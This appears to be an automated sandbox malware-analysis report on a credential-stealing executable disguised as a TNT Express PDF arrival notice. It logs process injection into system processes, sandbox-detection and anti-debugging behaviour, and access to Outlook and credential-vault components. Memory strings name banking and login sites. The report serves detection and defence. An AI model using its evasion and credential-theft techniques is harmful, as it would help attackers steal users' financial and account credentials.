Source: C:\Windows\SysWOW64\getmac.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe"	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Process created: C:\Windows\SysWOW64\getmac.exe "C:\Windows\SysWOW64\getmac.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\getmac.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\getmac.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Static file information: File size 1262592 > 1048576

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hoCcQGubWgo.exe, 00000003.00000000.1474512552.0000000000B3E000.00000002.00000001.01000000.00000004.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3820695813.0000000000B3E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1365362086.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1364162734.0000000003970000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459501826.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1563862530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1563862530.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1457483219.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000003.1563348781.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3831888062.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3831888062.000000000516E000.00000040.00001000.00020000.00000000.sdmp, getmac.exe, 00000004.00000003.1565634565.0000000004E24000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1365362086.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1364162734.0000000003970000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1459501826.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1563862530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1563862530.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1457483219.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, getmac.exe, 00000004.00000003.1563348781.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3831888062.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3831888062.000000000516E000.00000040.00001000.00020000.00000000.sdmp, getmac.exe, 00000004.00000003.1565634565.0000000004E24000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: getmac.pdb source: svchost.exe, 00000002.00000003.1532379119.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532312542.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532391686.0000000002C3B000.00000004.00000020.00020000.00000000.sdmp, hoCcQGubWgo.exe, 00000003.00000003.1905636199.000000000148B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: getmac.exe, 00000004.00000002.3820332065.0000000003286000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3833043675.00000000055FC000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000002F7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1857846870.0000000029ADC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: getmac.exe, 00000004.00000002.3820332065.0000000003286000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3833043675.00000000055FC000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000002F7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1857846870.0000000029ADC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: getmac.pdbGCTL source: svchost.exe, 00000002.00000003.1532379119.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532312542.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532391686.0000000002C3B000.00000004.00000020.00020000.00000000.sdmp, hoCcQGubWgo.exe, 00000003.00000003.1905636199.000000000148B000.00000004.00000020.00020000.00000000.sdmp

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_008C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008C42DE

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E0A76 push ecx; ret	0_2_008E0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E85F push edi; iretd	2_2_0041E86F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E863 push edi; iretd	2_2_0041E86F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004190A8 pushfd ; retf	2_2_004190A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E94B push ss; retf	2_2_0041E96F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00419162 push B96AB53Fh; ret	2_2_00419185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004182DD push ecx; ret	2_2_004182DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004052DD push FFFFFFD4h; retf	2_2_004052DF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041EADC push es; iretd	2_2_0041EAF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00415BB3 push esi; retf	2_2_00415BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041AC6E push ecx; ret	2_2_0041AC6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403410 push eax; ret	2_2_00403412
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413C94 push esp; iretd	2_2_00413C95
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AD6C push esp; iretd	2_2_0040AD82
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418581 push edi; retf	2_2_0041859D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004085AB push ecx; ret	2_2_004085B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417FD8 push esp; iretd	2_2_00417FE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx	2_2_032309B6
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0356A3D9 push edi; retf	3_2_0356A3F5
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0355CBC4 push esp; iretd	3_2_0355CBDA
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03567A07 push esi; retf	3_2_03567A16
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03567A0B push esi; retf	3_2_03567A16
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0356CAC6 push ecx; ret	3_2_0356CAC7
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03565AEC push esp; iretd	3_2_03565AED
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03568153 push 56D0CAFFh; iretd	3_2_03568158
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03557135 push FFFFFFD4h; retf	3_2_03557137
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0356A135 push ecx; ret	3_2_0356A136
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0356AF00 pushfd ; retf	3_2_0356AF01
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0356AFBA push B96AB53Fh; ret	3_2_0356AFDD
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_035707A3 push ss; retf	3_2_035707C7
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03567E08 push eax; iretd	3_2_03567E0B

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	File created: \tnt express arrival notice awb 8013580 1182023_pdf_.exe
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	File created: \tnt express arrival notice awb 8013580 1182023_pdf_.exe			Jump to behavior

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_008DF98E
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00951C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00951C41

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-98094

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	API/Special instruction interceptor: Address: 8B3264
Source: C:\Windows\SysWOW64\getmac.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\getmac.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\getmac.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\getmac.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\getmac.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\getmac.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\getmac.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\getmac.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\getmac.exe

Window / User API: threadDelayed 9808

Jump to behavior

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	API coverage: 3.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\getmac.exe	API coverage: 2.9 %

Source: C:\Windows\SysWOW64\getmac.exe TID: 7864	Thread sleep count: 165 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe TID: 7864	Thread sleep time: -330000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe TID: 7864	Thread sleep count: 9808 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe TID: 7864	Thread sleep time: -19616000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe TID: 7880	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe TID: 7880	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe TID: 7880	Thread sleep time: -63000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe TID: 7880	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe TID: 7880	Thread sleep time: -42000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\getmac.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\getmac.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0092DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0092DBBE
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008FC2A2 FindFirstFileExW,	0_2_008FC2A2
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_009368EE FindFirstFileW,FindClose,	0_2_009368EE
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0093698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0093698F
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0092D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0092D076
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0092D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0092D3A9
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00939642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00939642
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0093979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0093979D
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00939B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00939B2B
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00935C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00935C97
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030CC560 FindFirstFileW,FindNextFileW,FindClose,	4_2_030CC560

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_008C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008C42DE

Source: 6D395-7-.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 6D395-7-.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 6D395-7-.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 6D395-7-.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 6D395-7-.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: hoCcQGubWgo.exe, 00000006.00000002.3826407275.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: 6D395-7-.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 6D395-7-.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 6D395-7-.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 6D395-7-.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 6D395-7-.4.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: getmac.exe, 00000004.00000002.3820332065.0000000003286000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1859298251.000001F469AEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 6D395-7-.4.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 6D395-7-.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 6D395-7-.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 6D395-7-.4.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 6D395-7-.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 6D395-7-.4.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 6D395-7-.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 6D395-7-.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 6D395-7-.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
